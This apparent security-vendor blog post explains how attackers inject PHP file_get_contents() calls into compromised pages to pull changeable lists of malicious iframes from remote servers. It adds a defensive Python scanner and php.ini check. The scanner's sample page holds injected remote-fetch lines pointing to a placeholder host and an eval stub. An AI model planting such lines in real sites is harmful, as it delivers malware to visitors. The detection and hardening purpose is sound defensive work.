An iframe alternative

Regular readers of our blog will be familiar with the use of malicious scripts (typically JavaScript) and iframe tags injected into compromised legitimate sites in order to silently load malicious content when a victim browses the page.

Whilst investigating one of the compromised sites involved in a web attack uncovered this week, I noticed some PHP scripts that had been added to the page.

[PHP within compromised page]

You can see the start of an obfuscated malicious script that was added in the attack (detected as Troj/Unif-B). Above that are several PHP additions, each one using the file_get_contents() function to read the contents of a remote file and then echoing it back into the page. Because the fetch happens server-side, the visitor's browser (and any scanner that only sees the served HTML) never sees the PHP or the remote URLs it reads from, only whatever those remote files currently contain. For this method to succeed, the allow_url_fopen configuration option within the PHP configuration on the compromised site has to be enabled (it is by default). Note that this is not the same as allow_url_include, which governs include/require of remote files and is off by default; file_get_contents() only needs allow_url_fopen.

Perhaps unsurprisingly, the text files loaded by the PHP contain a list of malicious iframes. So, to the victim, the effect is much the same: browsing the page results in the loading of malicious content from multiple domains. For the attackers there is an added bonus, since the list of iframes can be changed on their own server at any time without touching the compromised page again. For security vendors, this is just another little trick used by the bad guys in order to evade detection.
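As an added example (not code from the original post or from the compromised site), the following Python script shows the two checks an administrator cleaning up such a site would want: a scan of PHP source for the "echo file_get_contents('http://...')" pattern described above, and a check of whether allow_url_fopen is enabled in a php.ini fragment. The sample page and php.ini lines are constructed for the example and the URLs are placeholders; the regex is deliberately simple and will not catch variants that build the URL from concatenated or encoded strings.

```python
import re

# Constructed sample of a compromised page. The remote fetches mimic the
# pattern described in the post; the URLs are placeholders, not real hosts.
# The last PHP line reads a local file and must NOT be flagged.
SAMPLE_PAGE = """<html><body>
<?php echo file_get_contents('http://example.invalid/a.txt'); ?>
<?php echo file_get_contents("http://example.invalid/b.txt"); ?>
<?php echo(file_get_contents('ftp://example.invalid/c.txt')); ?>
<?php echo file_get_contents('/var/www/site/footer.html'); ?>
<script>eval(unescape('...'))</script>
</body></html>"""

# echo, optional "(", file_get_contents( <quote> scheme://... <quote> )
# Only URL wrappers (http, https, ftp, ftps) are of interest: these are the
# ones that need allow_url_fopen and that pull content from an attacker host.
REMOTE_FETCH_ECHO = re.compile(
    r"""echo\s*\(?\s*file_get_contents\s*\(\s*(['"])((?:https?|ftps?)://[^'"]+)\1\s*\)""",
    re.IGNORECASE,
)


def find_remote_echo_includes(php_source: str) -> list:
    """Return the remote URLs that are fetched and echoed straight into the page."""
    return [m.group(2) for m in REMOTE_FETCH_ECHO.finditer(php_source)]


def allow_url_fopen_enabled(php_ini: str) -> bool:
    """Decide whether allow_url_fopen is on for a php.ini fragment.

    ';' starts a comment in php.ini. If the directive is absent, PHP's
    built-in default (On) applies, which is what makes the trick work
    on an untouched installation. The last occurrence wins, as in PHP.
    """
    value = None
    for raw in php_ini.splitlines():
        line = raw.split(';', 1)[0].strip()
        m = re.match(r'allow_url_fopen\s*=\s*(\S+)', line, re.IGNORECASE)
        if m:
            value = m.group(1).strip('"').lower()
    if value is None:
        return True
    return value in ('1', 'on', 'true', 'yes')


if __name__ == '__main__':
    for url in find_remote_echo_includes(SAMPLE_PAGE):
        print('remote content echoed from:', url)
    print('allow_url_fopen on with empty ini:', allow_url_fopen_enabled(''))
    print('allow_url_fopen on with Off set:', allow_url_fopen_enabled('allow_url_fopen = Off'))
```

Setting allow_url_fopen = Off in php.ini neutralises this particular trick (the directive is system-level, so an injected script cannot re-enable it with ini_set()), but it also breaks any legitimate code on the site that fetches remote resources through PHP's URL wrappers, so check for those before flipping it.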